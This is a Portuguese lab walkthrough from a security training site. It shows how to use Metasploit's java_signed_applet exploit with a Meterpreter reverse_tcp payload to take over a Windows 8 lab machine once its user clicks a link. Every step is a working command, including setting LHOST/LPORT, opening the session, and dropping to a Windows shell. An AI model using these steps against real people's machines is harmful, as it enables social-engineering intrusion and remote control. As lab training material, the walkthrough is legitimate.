Esta vulnerabilidade pode ser facilmente explorada aliada a técnica de engenharia social, por isso que é importante conscientizar as pessoas para não clicarem em qualquer link que recebem.

Laboratório

Kali Linux : 10.10.10.130
Windows 8 : 10.10.10.129

01 - Passo

Execute o MSF Console.

Linux
msfconsole

02 - Passo

Utilize o exploit java_signed_applet.

Linux
msf > use exploit/multi/browser/java_signed_applet

03 - Passo

Defina o servidor Kali Linux 10.10.10.130 como conexão principal do exploit java_signed_applet.

Linux
msf exploit (java_signed_applet) > set SRVHOST 10.10.10.130

04 - Passo

Defina a porta do servidor Kali Linux 8080 como conexão principal do exploit java_signed_applet.

Linux
msf exploit (java_signed_applet) > set SRVPORT 8080

05 - Passo

Utilize o PAYLOAD reserve_tcp para estabelecer a conexão entre o host e o servidor.

Linux
msf exploit (java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp

06 - Passo

Defina o servidor Kali Linux 10.10.10.130 como conexão principal para o PAYLOAD reverse_tcp.

Linux
msf exploit (java_signed_applet) > set LHOST 10.10.10.130

07 - Passo

Defina a porta do servidor Kali Linux 10.10.10.130 como conexão principal para o PAYLOAD reverse_tcp.

Linux
msf exploit (java_signed_applet) > set LPORT 4444

08 - Passo

Execute o exploit para gerar a URL a ser acessada pelo Windows 8 http://10.10.10.130:8080/clR8lKjmGpiSXqQ.

Linux
msf exploit (java_signed_applet) > exploit

09 - Passo

No Windows 8 ao realizar o acesso ao link http://10.10.10.130:8080/clR8lKjmGpiSXqQ será exibida uma janela de Advertência de Segurança, aceite o Risco e clique em Executar.

10 - Passo

Observe que a conexão foi estabelecida com o servidor.

11 - Passo

Execute o comando sessions para exibir as sessões de conexão.

Linux
msf exploit (java_signed_applet) > sessions

12 - Passo

Estabeleça a conexão na sessão 1.

Linux
msf exploit (java_signed_applet) > sessions -i 1

13 - Passo

Com a conexão estabelecido digite comando utilizados no windows como o ipconfig para visualizar as conexões de rede.

Linux
meterpreter > ipconfig

14 - Passo

Utilize o comando sysinfo para exibir as Informações de Sistema, como o Nome do Computador e versão do Sistema Operacional.

Linux
meterpreter > sysinfo

15 - Passo

Execute o comando shell para exibir o console do Windows 8.

Linux
meterpreter > shell

16 - Passo

Liste todos arquivos/diretórios que estão no Desktop.

Linux
C:\Users\Marcos\Desktop>dir

17 - Passo

Crie o diretório 100SECURITY.

Linux
C:\Users\Marcos\Desktop>mkdir 100SECURITY

18 - Passo

Como pode visualizar o diretório 100SECURITY foi criado com sucesso.



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2020 - 100SECURITY

Contato